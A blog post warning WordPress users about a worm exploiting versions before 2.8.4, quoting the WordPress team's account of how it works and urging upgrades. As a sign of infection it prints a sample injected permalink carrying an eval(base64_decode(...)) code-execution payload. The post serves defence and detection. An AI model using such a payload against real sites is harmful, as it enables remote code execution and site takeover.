Technofriends

Older Wordpress version ( versions lesser than Wordpress 2.8.4) are currently under attack because of a “worm” which is circulating on the internet and has already affected a lot of websites using older versions of Wordpress.

As per a recent post on the Wordpress blog, this is how the worm operates.

Right now there is a worm making its way around old, unpatched versions of WordPress. This particular worm, like many before it, is clever: it registers a user, uses a security bug (fixed earlier in the year) to allow evaluated code to be executed through the permalink structure, makes itself an admin, then uses JavaScript to hide itself when you look at users page, attempts to clean up after itself, then goes quiet so you never notice while it inserts hidden spam and malware into your old posts.

Wordpress 2.8.4, the current version of WordPress, is immune to this worm. (So was the release before this one.) If you’ve been thinking about upgrading but haven’t gotten around to it yet, now would be a really good time. If you’ve already upgraded your blogs, maybe check out the blogs of your friends or that you read and see if they need any help. A stitch in time saves nine.

If you are using a Wordpress installation which is not the latest release, a nag screen on the Wordpress Admin panel should be alerting you for an upgrade. Wordpress 2.7 and later have auto-upgrade capability. So if your blog or website uses an older version, its time to upgrade now.

How To Know if your Wordpress site has already been attacked?

There are two clues that your WordPress site has been attacked.

There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.”

The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize.

WordPress.com blogs are not impacted as they are up-to-date. Only versions prior to WordPress 2.8.4 are impacted.

If you have pertinent information that will help the WordPress team track down and stop this attack, please report it to security@wordpress.org.

You can also follow me on Twitter at http://twitter.com/vaibhav1981

Do stay tuned to Technofriends for more, one of the best ways of doing so is by subscribing to our feeds. You can subscribe to Technofriends feed by clicking here.

Related posts:

1. [Wordpress] WP-Scanner Lets You Know How Secure Is Your Wordpress Blog.
2. [How-To] Add a FavIcon to your Wordpress Blog
3. [Security] Wordpress 2.8.5 Released
4. [Wordpress] Wordpress 2.8.2 Makes It To The World.
5. Wordpress 2.9.2 Released (Addresses Security Concern with Trashed Posts)